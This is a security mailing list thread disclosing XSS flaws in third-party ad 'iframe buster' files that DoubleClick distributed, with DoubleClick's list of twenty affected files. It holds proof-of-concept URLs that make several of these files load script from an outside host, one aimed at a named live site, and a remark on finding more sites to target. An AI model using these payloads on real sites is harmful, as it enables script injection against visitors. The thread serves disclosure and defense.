Next step, email from DoubleClick <[email protected] Some more files to clean/check:
---- Dear Customer, We’ve identified certain vendor files that may contain XSS vulnerabilities which could pose a security risk. Please check if you are hosting these files and remove them with the help of your webmaster. These are the currently identified third-party vendor files: 1. adform/IFrameManager.html 2. admotion/afa-iframe.htm 3. bonzai/bonzaiBuster.html 4. exponential/buster.html 5. eyeblaster/addineyeV2.html 6. eyewonder/interim.html 7. flashtalking/ftlocal.html 8. ipinyou/py_buster.html 9. jivox/jivoxibuster.html 10. mediaplex/mojofb_v9.html 11. mixpo/framebust.html 12. predicta/predicta_bf.html 13. rockabox/rockabox_buster.html 14. liquidus/iframeX.htm 15. controbox/iframebuster.html 16. spongecell/spongecell-spongecellbuster.html 17. unicast/unicastIFD.html 18. adrime/adrime_burst.2.0.0.htm 19. revjet/revjet_buster.html 20. kpsule/iframebuster.html We have disabled these vendors where possible for all DoubleClick for Publishers and DoubleClick Ad Exchange customers. However, any of the mentioned files hosted on your site may still pose a risk and should be taken down. We will notify you as we learn more. For more information please refer to this Help Center article. Regards, The DoubleClick for Publishers and DoubleClick Ad Exchange Teams --------- Fun fact ? You can probably use DoubleClick to help you found website where you can "serve" XSS/expandable ads. Tr4L 2017-12-19 17:09 GMT+01:00 Zmx <[email protected]>: > Some more details: > > 1) The google article seems to link the problematic kit only in > non-english local (check the french version or spanish one) > 2) In order for predicta to work, you should host your javascript on a > specific path: /mrm-ad/commons.js > > > 2017-12-19 15:24 GMT+01:00 Zmx <[email protected]>: > >> Hi list, >> >> The DFP AdExchange service of Google (the service who provide ads) is >> distributing an "Iframe Buster Kit" in order to allow iframe ads to expand >> outside of the iFrame. >> >> This needs some bypass of the restriction applied to iframe, so Google >> provide a kit to install on your website: >> - Help Document: https://support.google.com/dfp_premium/answer/1074250 >> - Kit: https://storage.googleapis.com/support-kms-prod/DB3CE51 >> C3A5F783ED8198CDA753995FEB913 >> >> The kit contains several html and js files to be hosted on your domains. >> >> Some of those files (still provide by Google, remember) contains very >> visible XSS code: >> One of them is "predicta" that simply allow you to pass the domain of >> from where to load the javascript. >> >> >> Quick proof of concept: >> - https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life >> >> As expandable ads allow website to gain more ads revenue, those kits is >> present in a lot of website. >> >> Other "iframe buster kit" exist that are not provided by Google, and some >> of them are also vulnerable. >> >> From my list I have: >> - /admotion/afa-iframe.htm?iq=https://bgtian.life/xss.js >> - /ipinyou/py_buster.html?pybust=https://bgtian.life/xss.js >> - /rockabox/rockabox_buster.html?rbbust=https://bgtian.life/xss.js (look >> like different version exist however) >> - /undertone/iframe-buster.html?ajurl=https://bgtian.life/xss.js >> >> >> Some source: >> - Code of predicta_bf.html provide by Google in the kit: >> https://pastebin.com/BggXDHNA >> - Code of https://bgtian.life/xss.js : https://pastebin.com/8GZTaJ4b >> - Code of rockabox: https://pastebin.com/xqhs3zyz >> >> Tr4L >> > > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
